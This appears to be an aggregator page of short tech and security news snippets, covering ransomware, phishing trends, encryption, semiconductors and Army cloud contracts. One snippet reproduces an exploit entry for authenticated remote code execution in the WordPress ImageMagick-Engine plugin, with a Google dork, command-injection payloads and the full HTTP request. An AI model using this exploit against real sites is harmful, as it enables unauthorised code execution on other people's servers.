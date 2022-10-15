Read full article on original website
Related
techaiapp.com
Week in review: 3FA, Fortinet firewalls under attack, and the riskiest connected devices
Lack of transparency, systemic risks weaken national cybersecurity preparedness. Bob Kolasky, SVP for Critical Infrastructure at Exiger, previously served as Assistant Director for Cybersecurity and Infrastructure Security Agency (CISA), and in this Help Net Security interview talks about protecting critical infrastructure, the importance of information-sharing, national cybersecurity preparedness, and more.
techaiapp.com
Machine learning accelerates development of advanced manufacturing techniques
Despite the remarkable technological advances that fill our lives today, the ways we work with the metals that underlie these developments haven’t changed significantly in thousands of years. This is true of everything from the metal rods, tubes, and cubes that provide cars and trucks with their shape, strength, and fuel economy, to wires that move electrical energy in everything from motors to undersea cables.
techaiapp.com
Nozomi Networks Report: Building Cyber Resilience in the Water Sector
Water has not typically been an industry closely associated with cybersecurity threats. But this has changed in recent years as the sector has become increasingly automated, with the rapid adoption and use of digital environments. As information technology (IT), operational technology (OT) and Internet of Things (IoT) become digitized and...
techaiapp.com
Plugging the Holes Remote Work Punched through Security
Mike Arrowsmith, chief trust officer at NinjaOne, makes the case for a permanent shift in the way businesses conduct remote security. The benefits of a flexible work environment continue to dominate the headlines — and for good reason. A study from the Pew Charitable Trust highlights that working from home is still fairly common even after most COVID restrictions have been lifted. The big difference is that now most teleworkers do so by choice. We are clearly entering a new phase of the work-from-home evolution.
techaiapp.com
Alpha and Omega Semiconductor Announces New High-SOA MOSFET Optimized for 12-V Hot-Swap Applications
Alpha and Omega Semiconductor Limited (AOS), a designer, developer, and global supplier of a broad range of power semiconductors, power ICs, and digital power products, announced the release of AONS30300, a 30-V MOSFET with low on-resistance. The AONS30300 features a high safe operating area (SOA) capability, making it ideally suited for demanding applications such as hot swap and eFuse.
techaiapp.com
Prestige ransomware targets Polish and Ukrainian organizations
Microsoft reported that new Prestige ransomware is being used in attacks targeting transportation and logistics organizations in Ukraine and Poland. The Prestige ransomware was first spotted on October 11 in attacks occurring within an hour of each other across all victims. An important feature of this campaign is that it...
techaiapp.com
Wordpress Plugin ImageMagick-Engine 1.7.4 – Remote Code Execution (RCE) (Authenticated)
# Exploit Title: Wordpress Plugin ImageMagick-Engine 1.7.4 - Remote Code Execution (RCE) (Authenticated) # Google Dork: inurl:"/wp-content/plugins/imagemagick-engine/" # Date: Thursday, September 1, 2022 # Exploit Author: ABDO10 # Vendor Homepage: https://wordpress.org/plugins/imagemagick-engine/ # Software Link: https://github.com/orangelabweb/imagemagick-engine/ # Version: <= 1.7.4 # Tested on: windows 10 -- vulnerable section https://github.com/orangelabweb/imagemagick-engine/commit/73c1d837e0a23870e99d5d1470bd328f8b2cbcd4#diff-83bcdfbbb7b8eaad54df4418757063ad8ce7f692f189fdce2f86b2fe0bcc0a4dR529 -- payload on windows: d&calc.exe&anything -- on unix : notify-send "done" -- exploit : GET /wp/wordpress/wp-admin/admin-ajax.php?action=ime_test_im_path&cli_path=[payload] HTTP/1.1 Host: localhost Cookie: wordpress_sec_xx=; wp-settings-time-1=; wordpress_test_cookie=; wordpress_logged_in_xx=somestuff User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: https://localhost/wp/wordpress/wp-admin/options-general.php?page=imagemagick-engine X-Requested-With: XMLHttpRequest Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-origin Te: trailers Connection: close.
techaiapp.com
Q3 2022 Cofense Phishing Intelligence Trends Review
The phishing threat landscape never stops transforming itself, and Q3 2022 has been another illustration of this. Emotet, despite changing tactics back to using macro laden Office documents for its delivery mechanism, drastically decreased in volume and then ceased activity in early Q3. However, because of the change in tactics by Emotet (even for a short period), macro laden Office documents became the top delivery mechanism for this quarter. All the top malware families from last quarter have found a place among the top families this quarter, although there was an overall increase in volume for Keyloggers and Remote Access Trojans. QakBot is the top malware family reaching enterprise users, which has led to a spike in volume for the banker malware type starting in late Q3.
techaiapp.com
Blockchain-Based Platform Created by Saudi Students Places Third in National Women’s Coding Competition – Blockchain Bitcoin News
A blockchain-based tender bidding platform that was designed by female university students has been named the third-best entry in a Saudi Arabian women’s coding competition. The competition is said to be part of Princess Nourah bint Abdulrahman University’s broader goal of supporting and empowering women in Saudi Arabia’s technology sector.
techaiapp.com
What Is Full-Disk Encryption? – Definition from TechTarget.com
FDE is especially useful for desktops, laptops and mobile devices that can be physically lost or stolen. Even if the device is stolen, the encrypted data will be inaccessible to the thief. Because one key is used to encrypt the entire hard drive, FDE requires network administrators to enforce a strong password policy and provide an encryption key backup process in case employees forget their password or leave the company unexpectedly.
techaiapp.com
Password usage is falling worldwide – but that might not be a big problem
Passwords are falling in popularity as people turn to more secure password-less authentication methods. That’s according to the FIDO Alliance’s latest Online Authentication Barometer report, which gathers insights into the state of online authentication globally. Based on a survey of more than 10,000 consumers in the UK, France,...
techaiapp.com
Army plans $1 billion ‘easy button’ contract to spur cloud migration
WASHINGTON — The U.S. Army will roll out a contract worth as much as $1 billion this fiscal year to spur the service’s migration to cloud-based computing. The multi-award, multi-vendor Enterprise Application Migration and Modernization deal, or EAMM, is expected to kick off in the second or third quarter, according to Chief Information Officer Raj Iyer. The contract is meant to make it easier and cheaper to advance the Army’s comprehensive cloud goals, including rapid software development, data-driven decision making and zero-trust cybersecurity.
techaiapp.com
Direct Satellite-to-Mobile Services Emerge – EE Times
/php echo do_shortcode(‘[responsivevoice_button voice=”US English Male” buttontext=”Listen to Post”]’) ?>. In just over 12 months, direct satellite-to-mobile communications have morphed from being a Sci-Fi pipe dream to a real-world prospect. Apple and T-Mobile are separately rolling out schemes with Globalstar and SpaceX, respectively, to...
Comments / 0